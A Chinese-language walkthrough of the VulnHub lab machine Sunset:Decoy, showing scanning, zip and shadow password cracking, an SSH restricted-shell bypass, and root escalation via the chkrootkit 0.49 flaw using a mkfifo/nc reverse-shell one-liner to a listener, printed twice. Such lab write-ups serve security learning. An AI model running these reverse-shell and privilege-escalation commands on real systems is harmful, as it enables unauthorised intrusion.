VulHub靶场 | Sunset:Decoy
2022-8-12 09:30:56 Author: 0x00实验室(查看原文) 阅读量:32 收藏

"我曾想隐归于世,却发现本就无人问津"


项目靶机地址:https://www.vulnhub.com/entry/sunset-decoy,505

0x00:主机发现:

sudo nmap -sP 192.168.33.1/24

目标IP:192.168.33.131

0x01:端口信息收集:

sudo nmap -sC -sV 192.168.33.131

访问80端口:

其中的save.zip 下载解压下来
使用密码爆破 看看解压密码能否爆破

zip2john save.zip >> passwd.txt john passwd.txt

发现压缩包里面是加密的帐号密码:

目录扫描:

sudo gobuster dir -u http://192.168.33.131 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium

John解密上述的压缩包文件:

john --wordlist=/usr/share/wordlists/rockyou.txt shadow

账号:296640a3b825115a47b68fc44501c828密码:server

SSH登录:

ssh 192.168.33.131 -l 296640a3b825115a47b68fc44501c828 server

发现该shell被限制 很多命令无法执行:

ssh bypass:

-t "bash --noprofile"

强制分配伪终端. 可以在远程机器上执行任何全屏幕(screen-based)程序, 所以非常有用, 例如菜单服务. 并联的 -t 选项强制分配终端,即使 没有本地终端.当 ssh 连接时是一个限制的 shell,可以使用此参数绕过限制

ssh 296640[email protected]168.33.131 -t "bash --noprofile" echo $PATH PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Chkrootkit 0.49 本地提权漏洞:

发现一个 pspy 运行后的记录文件,记录了一个压缩包解压命令:

而 chkrootkit 有 0.49 以下版本有本地提权漏洞,先查找一下 poc

searchsploit chkrootkit

33899.txt 提示只要在/tmp 目录下有一个 update 的可执行文件,那么运行 chkrootkit 的时候会以 root 权限运行/tmp/update 文件,那么我们只需要写入一个反弹 shell 即可

cd /tmp echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.33.150 4444>/tmp/f" > update chmod 777 update

攻击机监听

nc -lvvp 4444

这个 chkrootkit0.49 是存在本地提权漏洞的,但是需要运行 chkrootkit,日志文件中是没有的,前面家目录下还有一个honeypot.decoy 是有运行权限的,运行之后有 8 个选项,其他七个都没什么用,第五个会启动一个 AV SCAN,这个应该就是启动chkrootkit 了.

提权成功

反弹 shell 的时候看下有没有 nc,如果有尽量使用

which nc echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.33.150 4444>/tmp/f" > update

文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5MDY2MTUyMA==&mid=2247488807&idx=1&sn=f9b7a8d80ff30244fe0796bd51bd4cb3&chksm=cfd86ad8f8afe3ce8759ef9e0d99db927eaebb78ba04286bd7d574bf89b02c2e38bf6c4160ad#rd
如有侵权请联系:admin#unsafe.sh